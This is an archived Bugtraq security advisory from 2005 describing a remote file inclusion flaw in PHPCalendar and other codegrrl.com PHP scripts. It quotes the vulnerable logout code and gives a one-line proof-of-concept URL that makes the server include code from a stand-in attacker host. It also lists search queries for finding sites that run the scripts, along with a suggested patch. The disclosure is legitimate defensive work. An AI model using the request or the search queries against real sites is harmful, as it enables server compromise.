PHPCalendar (and some more codegrrl.com products) arbitrary code execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPCalendar (and some more codegrrl.com products) arbitrary code execution
From: r.verton@xxxxxxxxx
Date: 13 Nov 2005 11:51:17 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PHPCalendar (and some more codegrrl.com products) arbitrary code execution
==========================================================================


   Software: PHPCalendar, PHPClique, PHPFanBase, PHPCurrently, PHPQuotes
   Severity: Arbitrary code execution
   Risk: High
   Author: Robin Verton <r.verton@xxxxxxxxx>
   Date: Sep. 24 2005
   Vendor: codegrrl.com [contacted]


   Description:

        Written in PHP/MySQL, PHPCalendar is a script designed especially to 
help webmasters to mantain a calendar, with all upcoming events and birthdays.
        It was designed to be used at personal sites, but it can also be very 
useful for fansites, to keep track of tours, premiers, awards shows, 
        tv apearances, interviews, magazines features, and many more! You can 
see it in use at unfloopy.net.
        [http://www.codegrrl.com/]


   Details:

        1) protection.php (with register_globals = On)
           If register_globals is on an attacker can include an arbitrary php 
file to execute malicious code.
        


           $logout_page = "$siteurl";

           [...]

           if ($action == "logout")
           {
                Setcookie("logincookie[pwd]","",time() -86400);
                Setcookie("logincookie[user]","",time() - 86400);
                @include($logout_page);
                exit;
           }

   Proof of Concept:

           To exploit this vulnerability an attacker only has to use the 
following HTTP-Request:
           
http://www.example.com/protection.php?action=logout&siteurl=http://yourhost.com/malicoius-code.txt

   Patch:
           Set register_globals in the php.ini off or disallow direct access to 
the protection.php f.e. define constants and use
           code like 

           if( !defined('IN_SYS') ) {
                die('Hacking attempt');
           } 

           to prevent the direct access
  
   Credits:

       Credit goes to Robin Verton, 15 years old from Germany

   References:

       [1] http://codegrrl.com
       [2] http://www.google.com/search?q=%22Powered+by%3A+PHPFanBase%22 [about 
112,000 results]
       [3] http://www.google.com/search?q=%22Powered+by%3A+PHPCalendar%22 
[about 44,000 results]
       [4] http://www.google.com/search?q=%22Powered+by%3A+PHPCurrently%22 
[about 44,000 results]
       [5] http://www.google.com/search?q=%22Powered+by%3A+PHPClique%22 
       [6] http://www.google.com/search?q=%22Powered+by%3A+PHPQuotes%22

Prev by Date: [ GLSA 200511-11 ] linux-ftpd-ssl: Remote buffer overflow
Next by Date: [FLSA-2005:152848] Updated glibc packages fix security issues
Previous by thread: [ GLSA 200511-11 ] linux-ftpd-ssl: Remote buffer overflow
Next by thread: [FLSA-2005:152848] Updated glibc packages fix security issues
Index(es):
- Date
- Thread